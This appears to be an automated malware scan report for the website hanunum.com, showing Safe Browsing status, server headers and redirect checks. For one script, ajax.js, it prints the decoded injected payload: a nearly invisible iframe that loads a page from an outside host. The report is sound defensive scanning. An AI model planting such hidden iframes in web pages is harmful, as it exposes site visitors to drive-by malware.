Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hanunum.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://hanunum.com/ | HTTP/1.1 302 Object moved Cache-Control: private Date: Sun, 11 Jan 2015 12:28:32 GMT Location: http://hanunum.com/main Server: Microsoft-IIS/6.0 Content-Length: 144 Content-Type: text/html P3P: CP=ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC Set-Cookie: PUID=A15F5D4E40C74EE392F4361B1B501305; domain=hanunum.com; path=/ Set-Cookie: ASPSESSIONIDSCCCCTTR=NAGFBGABDAHOBPDGCEGLOBGP; path=/ X-Powered-By: ASP.NET | clean |
http://hanunum.com/main | HTTP/1.1 301 Moved Permanently Date: Sun, 11 Jan 2015 12:28:33 GMT Location: http://hanunum.com/main/ Server: Microsoft-IIS/6.0 Content-Length: 170 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://hanunum.com/main/ | HTTP/1.1 302 Object moved Cache-Control: private Date: Sun, 11 Jan 2015 12:28:34 GMT Location: /main/main_real.asp Server: Microsoft-IIS/6.0 Content-Length: 140 Content-Type: text/html P3P: CP=ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC Set-Cookie: PUID=0262A886611C4D5585F508FD02B31DAF; domain=hanunum.com; path=/ Set-Cookie: ASPSESSIONIDSCCCCTTR=CBGFBGABFEOFOAIIAEFMGNEG; path=/ X-Powered-By: ASP.NET | clean |
http://hanunum.com/main/main_real.asp | 200 OK Content-Length: 30130 Content-Type: text/html | clean |
http://hanunum.com/jscript/common.js | 200 OK Content-Length: 21931 Content-Type: application/x-javascript | clean |
http://hanunum.com/jscript/embed.js | 200 OK Content-Length: 2953 Content-Type: application/x-javascript | clean |
http://hanunum.com/jscript/ajax.js | 200 OK Content-Length: 2890 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. var ajax;
function Ajax() { this.XmlHttpReq = null; this.type = null; this.url = null; this.param = null; this.returnExec = null; this.iswait = false; this.encodeParam = function(value) { value = escape(value); value = value.replace(/\+/g, '%2B'); return value; } this.getXmlHttpRequest = function() { if (window.XMLHttpRequest) { this. ...[2371 bytes skipped]... Decoded script: <iframe src='http://ec.orp.co.kr/00_acupload/New/view.html' width='60' height='1' frameborder='0'></iframe> | ||
http://hanunum.com/jscript/json.js | 200 OK Content-Length: 5093 Content-Type: application/x-javascript | clean |
http://hanunum.com/jscript/rollover.js | 200 OK Content-Length: 1033 Content-Type: application/x-javascript | clean |
http://hanunum.com/jscript/user_func.js | 200 OK Content-Length: 2552 Content-Type: application/x-javascript | clean |
http://hanunum.com/popup_main.js.asp | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://hanunum.com/test404page.js | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://hanunum.com/jscript/cookie.js | 200 OK Content-Length: 1022 Content-Type: application/x-javascript | clean |
http://hanunum.com/jscript/floating.js | 200 OK Content-Length: 3457 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hanunum.com
Result:
HTTP/1.1 302 Object moved
Cache-Control: private
Date: Sun, 11 Jan 2015 12:28:32 GMT
Location: http://hanunum.com/main
Server: Microsoft-IIS/6.0
Content-Length: 144
Content-Type: text/html
P3P: CP=ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC
Set-Cookie: PUID=A15F5D4E40C74EE392F4361B1B501305; domain=hanunum.com; path=/
Set-Cookie: ASPSESSIONIDSCCCCTTR=NAGFBGABDAHOBPDGCEGLOBGP; path=/
X-Powered-By: ASP.NET
...144 bytes of data.
GET / HTTP/1.1
Host: hanunum.com
Result:
HTTP/1.1 302 Object moved
Cache-Control: private
Date: Sun, 11 Jan 2015 12:28:32 GMT
Location: http://hanunum.com/main
Server: Microsoft-IIS/6.0
Content-Length: 144
Content-Type: text/html
P3P: CP=ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC
Set-Cookie: PUID=A15F5D4E40C74EE392F4361B1B501305; domain=hanunum.com; path=/
Set-Cookie: ASPSESSIONIDSCCCCTTR=NAGFBGABDAHOBPDGCEGLOBGP; path=/
X-Powered-By: ASP.NET
...144 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hanunum.com
Referer: http://www.google.com/search?q=hanunum.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hanunum.com
Referer: http://www.google.com/search?q=hanunum.com
Result:
The result is similar to the first query. There are no suspicious redirects found.